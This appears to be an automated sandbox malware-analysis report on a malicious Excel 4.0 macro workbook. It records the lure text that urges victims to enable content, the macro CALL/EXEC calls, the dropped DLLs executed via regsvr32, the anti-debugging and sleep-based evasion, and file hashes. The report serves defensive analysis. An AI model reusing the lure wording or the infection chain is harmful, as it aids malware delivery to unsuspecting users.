Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://login.windows.local
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://management.azure.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://management.azure.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://tasks.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing " to unlock the editing document downloaded from the ir 13 14 Protected View This f
Source: Screenshot number: 4	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start " 18 the decryption of the doc

Found Excel 4.0 Macro with suspicious formulas

Source: Delivery_Information_7038598.xlsb	Initial sample: CALL
Source: Delivery_Information_7038598.xlsb	Initial sample: CALL
Source: Delivery_Information_7038598.xlsb	Initial sample: EXEC

Office process drops PE file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll			Jump to dropped file

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: classification engine

Classification label: mal88.expl.evad.winXLSB@3/11@0/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{7BE2EDF5-A9C4-4DEF-9DC0-1522802C2D95} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Delivery_Information_7038598.xlsb	Initial sample: OLE zip file path = xl/media/image1.png
Source: Delivery_Information_7038598.xlsb	Initial sample: OLE zip file path = xl/media/image2.png
Source: Delivery_Information_7038598.xlsb	Initial sample: OLE zip file path = xl/media/image3.png
Source: Delivery_Information_7038598.xlsb	Initial sample: OLE zip file path = xl/media/image4.png
Source: Delivery_Information_7038598.xlsb	Initial sample: OLE zip file path = xl/media/image5.png

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Data Obfuscation:

Registers a DLL

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_03042ABC push dword ptr [edx+14h]; ret

2_2_03042BFD

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4600

Thread sleep time: -70000s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Thread delayed: delay time: 70000

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Yara detected Xls With Macro 4.0

Source: Yara match

File source: app.xml, type: SAMPLE

ID:	432152
Product:	CloudBasic
Start time:	19:45:26
Start date:	09.06.2021
Sample:	Delivery_Information_7038598.xlsb
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	aa12a71a4c31152958b75aa2cc0dd605
SHA1:	1709bd79ab07bc915d19b351a0c6000fafb91d70
SHA256:	201d6c214af9eea64e1882a17b2b14a789c50aa6202192b5474cd890bae4f1bf
Filetype:	Excel Microsoft Office Binary workbook document (47504/1) 49.74%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\020EDADF-4CF2-4A17-8391-1EC74C095F72	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators	3493B85E11578A008313ABCB5C3B285F	4ACF1ECEB094FF91F9894A34846B7B6ECCB216E4	F6C99F16C037DD5AA5DE3A9A5F7F543031AC5E45CE2EA4ADE29FAF5BFC57603A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\31495E89.png	PNG image data, 168 x 72, 8-bit/color RGB, non-interlaced	C7ED6FC355D8632DB1464BE3D56BF5CC	615484A338922DDF00B903CFA48060AD60D70207	26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\40C82274.png	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	32C83607A5C98C5A634278E5AED3AD61	EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362	4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCF47EA8.png	PNG image data, 288 x 77, 8-bit/color RGB, non-interlaced	839795652A8FE78F26F4D86D757ABDE8	979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60	1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E47A0A7F.png	PNG image data, 178 x 76, 8-bit/color RGB, non-interlaced	9AD30E24270C495AE68EAF3A1EEECBFB	8642D256E7FFBEF5804A2D2220A1FE475A99DC36	6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F7C562F6.png	PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced	B34FB4F2F0F9E70B72BA3AFD028CD97C	C6868336F78DEA1E718965DF3341039581DB5B5A	189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	9A5193A07A0389FFCBB90FC230B534D2	12BFC2D4A87391669A964421691ABE7BAECD6195	84175BA73A6A59496E2D020D05A120E9E8E94AC3A4FDEA8FC381ACDA452BB991
C:\Users\user\AppData\Local\Temp\8AA40000	data	28A0EC2F006425816BA8AF766BF4C76A	DB7785BED2F214866B48D5DC82D94D34B57CEA86	444E496DC7DEEF0DC195344BF0D47BB1B0495CC9D121512C596ABF7328F97126
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC	Little-endian UTF-16 Unicode text, with CR line terminators	7962B839183642D3CDC2F9CEBDBF85CE	2BE8F6F309962ED367866F6E70668508BC814C2D	5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
C:\Users\user\Desktop\~$Delivery_Information_7038598.xlsb	data	7AB76C81182111AC93ACF915CA8331D5	68B94B5D4C83A6FB415C8026AF61F3F8745E2559	6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
C:\Users\user\kdldyeff.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	9A5193A07A0389FFCBB90FC230B534D2	12BFC2D4A87391669A964421691ABE7BAECD6195	84175BA73A6A59496E2D020D05A120E9E8E94AC3A4FDEA8FC381ACDA452BB991

Analysis Report Delivery_Information_7038598.xlsb

Overview

General Information

Detection

Signatures

Classification

Signatures

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs